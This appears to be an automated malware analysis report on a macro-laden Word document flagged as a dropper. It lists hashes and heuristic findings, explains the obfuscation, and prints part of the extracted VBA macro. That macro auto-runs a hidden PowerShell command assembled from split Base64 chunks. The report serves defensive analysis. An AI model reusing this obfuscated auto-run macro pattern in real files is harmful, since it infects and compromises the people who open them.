Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 2eb3c9502d68b328…

Verdict: MALICIOUS

File type: Office (OLE)

Size: 107.0 KB
Created: 2018-05-24 08:43:00
Authoring application: Microsoft Office Word
First seen: 2019-11-20
MD5: 71c6550a1c7920ec9ca0465f080f1d20
SHA-1: ddf86aa738c7e05ecbaef71cd97256afdb287f19
SHA-256: 2eb3c9502d68b32862144a095d00a673f58b8258e7d2890bcb3fac25411d90a0
Risk score: 242

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1204.002 User Execution: Malicious File
T1566.001 Phishing: Spearphishing Attachment

The sample is a Word document whose VBA project is padded with dead code: every statement of the form x = a - Cos(b) * 1 - Chr(n) / m - ChrB(c) either errors out (Chr() rejects values that large) or produces a value nothing reads, and On Error Resume Next swallows the errors; the bare numeric assignments between them are dead stores. The live path is short. Sub Autoopen() calls EFNIR(AOnVBYMBvTC), and EFNIR passes tzhROzOl + Chr(vbKeyP) + RLZAzJ + hBrfDFE to Shell(..., vbHide). tzhROzOl and RLZAzJ are never assigned, so they are Empty and concatenate as empty strings; Chr(vbKeyP) is "P"; hBrfDFE is the string that AOnVBYMBvTC assembles from the split literals returned by kOBowZZrP, aSqsqMVbb and the other chunk functions. The executed command line therefore begins PowersHeLL -WinDowsTyle hidden -e followed by Base64. PowerShell matches parameter names case-insensitively, so -WinDowsTyle is -WindowStyle Hidden and -e is -EncodedCommand. Decoding the visible Base64 prefix as UTF-16LE gives .( ([sTRING]$VerBoSePReFERenCE)[1,3]+'x'-JOin'')(((("{8}{37}{108}{80}... : with $VerbosePreference at its default value SilentlyContinue, characters 1 and 3 are i and e, so the command resolves the alias iex and invokes a string that the rest of the payload reassembles from a format-string template. The template's arguments, and with them any download URL, lie beyond the truncated macro preview, so the download-and-execute role is inferred from this pattern and from the ClamAV family label Doc.Dropper.Agent-6555726-0 rather than read from visible strings. The OLE_LEGACY_WORDBASIC_AUTOEXEC finding below reports the same Autoopen entry point; its generic wording about no recovered VBA project does not apply here, since the VBA source was extracted (macros.bas).

Heuristics (7)

  • ClamAV: Doc.Dropper.Agent-6555726-0 [critical] (CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Dropper.Agent-6555726-0
  • VBA macros detected [medium, 3 related findings] (OLE_VBA_MACROS)
    Document contains VBA macro code
  • Shell() call in VBA [critical] (OLE_VBA_SHELL)
    Shell() call in VBA: WzmUfvbCSQA = Shell(..., vbHide) in Function EFNIR
  • AutoOpen macro [high] (OLE_VBA_AUTOOPEN)
    AutoOpen macro: Sub Autoopen() in module iCSzivhuC
  • VBA p-code auto-exec with execution tokens [high] (OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker [medium] (OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info] (EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body). This is the OOXML DrawingML namespace identifier that Word writes into embedded drawing parts; it is a schema name, not a network indicator, and is not worth blocking or hunting for.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 16095 bytes
SHA-256: 1906b446c291c171dd1daa8c8f1022b0580c33dbce99d0d4e50c834de90845ac

Preview: first 1,000 lines of the extracted script (two modules; the listing is cut off at the end of the page)
Attribute VB_Name = "iCSzivhuC"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function AOnVBYMBvTC()
On Error Resume Next
dFWtF = zmmBj - Cos(ctHtab) * 1 - Chr(11530) / 97178 - ChrB(TsSIlw)
zZZSE = 59273
uwKVBA = pnvvu - Cos(cLbUE) * 1 - Chr(13037) / 61656 - ChrB(NDlTM)
mMbOtz = 93703
AOnVBYMBvTC = kOBowZZrP + aSqsqMVbb + tKRHitsFj + NDNVs + dFJzmHm + CGszKA + iKinzBhPkK + wiSRCvInc + BLftDFTsdRU
uPGEw = dEXMr - Cos(lozFNz) * 1 - Chr(97617) / 74904 - ChrB(vZBoPc)
MjBwJQ = 32851
End Function
Sub Autoopen()
On Error Resume Next
OzINj = jYcUw - Cos(OVAvwJ) * 1 - Chr(61666) / 98566 - ChrB(EQjqAs)
LviVXm = 83710
EFNIR (AOnVBYMBvTC)
plGYO = ZTQiO - Cos(fGzAjR) * 1 - Chr(40041) / 19442 - ChrB(ZWfPqN)
mdacdm = 12222
End Sub
Function EFNIR(hBrfDFE)
On Error Resume Next
DHkpi = SMmBKE - Cos(ilFRhf) * 1 - Chr(31444) / 28092 - ChrB(IXotjn)
lMtzk = 94221
jffkGK = NfIjEr - Cos(KwGqw) * 1 - Chr(54272) / 97357 - ChrB(BlRfJ)
pRFMl = 17955
WzmUfvbCSQA = Shell(tzhROzOl + Chr(vbKeyP) + RLZAzJ + hBrfDFE, vbHide)
mBuJE = usfJcv - Cos(aQmJlU) * 1 - Chr(57372) / 38614 - ChrB(uTbAtY)
CXTiw = 47379
End Function


Attribute VB_Name = "LjuuDUVbpjbZYi"
Function kOBowZZrP()
On Error Resume Next
tqcFMX = naChUZ - Cos(fwPTCw) * 1 - Chr(56015) / 3478 - ChrB(CFviuU)
uXMZP = 98908
VqJZDjIh = "owersHeLL -WinD" + "owsTy" + "le hidd" + "en -e LgAoACAAK" + "ABbAHMAVABSAEk" + "ATgBHAF0" + "AJABWA" + "GUAcgBCAG8AU" + "wBlAFAA" + "UgBlAEYARQBSAGU"
ptVOwv = iXZTcb - Cos(dLYKr) * 1 - Chr(10801) / 49423 - ChrB(RsuSF)
KHAVf = 46870
pYYpB = "ATgBDAEUAKQBbA" + "DEALAAzAF0AKwAn" + "AHgAJwAtA" + "EoATwBpAG4AJ" + "wAnACkAKAAoAC" + "gAKAAiAHsAOAB"
ZjhjF = YhWLSt - Cos(RLnOX) * 1 - Chr(88113) / 1045 - ChrB(ccTiqd)
QYwwC = 64209
JihFAzamPRK = "9AHsAMwA3AH0" + "AewAxAD" + "AAOAB9AHsAOAAw" + "AH0AewA" + "yAH0AewA0ADI" + "AfQB7" + "ADEAMgB9AHsANQA"
iqilF = SuhcZ - Cos(qwTlzm) * 1 - Chr(45831) / 70779 - ChrB(EOCPWE)
zNVqj = 25449
BJMkjH = "2AH0Aew" + "AxADEANgB9AHsAN" + "AA1AH0AewA" + "5ADMA" + "fQB7A" + "DcANAB9AHsA" + "OQA2AH0AewAxADE" + "ANQB9AHsAOQA3A"
zklozW = urFwnV - Cos(nAKfwG) * 1 - Chr(50498) / 54821 - ChrB(VjzBzU)
iLdRW = 2937
Ouzwa = "H0AewAzADUAfQ" + "B7ADEAMQB9A" + "HsAMg" + "A5AH0AewAx" + "ADIAMgB9AHsAN" + "AA2AH0AewA1"
zYOQJ = zRjiU - Cos(MLLjG) * 1 - Chr(12547) / 39785 - ChrB(PECVj)
kWmJD = 50766
rsvTonlIZc = "ADAAfQB7ADE" + "ANAB9AHsAM" + "gAzAH0A" + "ewA4ADEAf"
oMGiqQ = iEAOj - Cos(HuWbWL) * 1 - Chr(2965) / 87507 - ChrB(tWtjjm)
iZfuYY = 99101
LjQfWPc = "QB7ADEAOQB9A" + "HsANQA" + "4AH0AewA1ADI" + "AfQB7ADE" + "ANQB9AH" + "sAMwAyAH0Aew" + "AxADAANgB9" + "AHsANg" + "A0AH0" + "AewAxAD"
BQqPd = EnowS - Cos(zLnsYs) * 1 - Chr(84321) / 36062 - ChrB(oJjTEZ)
jlOjvR = 49181
iWiSKDAAl = "EANwB9A" + "HsANgAxA" + "H0AewA2ADcAfQB" + "7ADEAMgA4" + "AH0AewA3ADAAfQ" + "B7ADkA"
kOBowZZrP = VqJZDjIh + pYYpB + JihFAzamPRK + BJMkjH + Ouzwa + rsvTonlIZc + LjQfWPc + iWiSKDAAl
End Function
Function aSqsqMVbb()
On Error Resume Next
VmQkp = EkRvaT - Cos(mVjhjU) * 1 - Chr(25775) / 13743 - ChrB(vZmdE)
hjvil = 65194
jDKjTDmHYDJ = "fQB7ADMANAB9AHs" + "ANgAy" + "AH0AewA4A" + "DYAfQB7A" + "DcAOQ" + "B9AHsA" + "MQAzAH0A" + "ewA5AD"
mbHdB = ZOXdGo - Cos(QiCOwM) * 1 - Chr(96943) / 23054 - ChrB(rwLiBC)
AshEPj = 8392
UaFZb = "QAfQB7" + "ADYAOQB9" + "AHsAMQAzA" + "DQAfQB" + "7ADEAMQA4AH0Aew"
DTdhu = vjoHm - Cos(hjlZjK) * 1 - Chr(92025) / 70692 - ChrB(SXhWj)
lYkjj = 58064
stYpJtBpiD = "AxADIA" + "NAB9AH" + "sAMQAzADMAfQB" + "7ADcAfQB7ADE" + "AMgA1AH0AewAx"
LdiQRS = RWWODB - Cos(HHUEn) * 1 - Chr(37700) / 31515 - ChrB(vvKOAK)
EaGUE = 41930
PzXhzzYBPhf = "ADMAM" + "gB9AHsAMgA4AH0" + "AewA0AD" + "kAfQB7ADgANAB9A" + "HsAMwA4AH0Aew" + "AzADkAfQB7ADcA"
rStdp = vBTTiD - Cos(QPbtKM) * 1 - Chr(50041) / 66053 - ChrB(GCRlKS)
IizzzQ = 3810
AWkDG = "NgB9AHsANwA" + "4AH0AewA4ADcAfQ" + "B7ADYAfQB7A" + "DYAMwB9AHsAMg" + "AwAH0AewAyA" + "DUAf
... (truncated)